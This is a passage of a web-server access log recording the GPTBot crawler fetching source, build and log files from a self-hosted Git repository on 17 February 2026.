GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" -[17/Feb/2026:17:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" -[17/Feb/2026:17:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" -[17/Feb/2026:17:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" -[17/Feb/2026:17:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11531] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:17:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19755] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" -[17/Feb/2026:17:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" -[17/Feb/2026:17:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" -[17/Feb/2026:17:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" -[17/Feb/2026:17:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19758] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" -[17/Feb/2026:17:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" -[17/Feb/2026:17:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" -[17/Feb/2026:17:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19752] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:17:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19748] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" -[17/Feb/2026:17:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19754] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" -[17/Feb/2026:17:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19723] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/main.py" -[17/Feb/2026:17:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" -[17/Feb/2026:17:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" -[17/Feb/2026:17:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" -[17/Feb/2026:17:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19759] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" -[17/Feb/2026:17:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" -[17/Feb/2026:17:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" -[17/Feb/2026:17:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19754] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" -[17/Feb/2026:17:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" -[17/Feb/2026:17:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" -[17/Feb/2026:17:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:13:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11053] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11551] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11093] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:13:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:17:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:17:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10054] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:17:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:17:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11229] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:17:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12419] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:17:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 15993] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild" [Client 74.7.227.38] [Length 51709] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:17:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29900] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29904] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29901] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 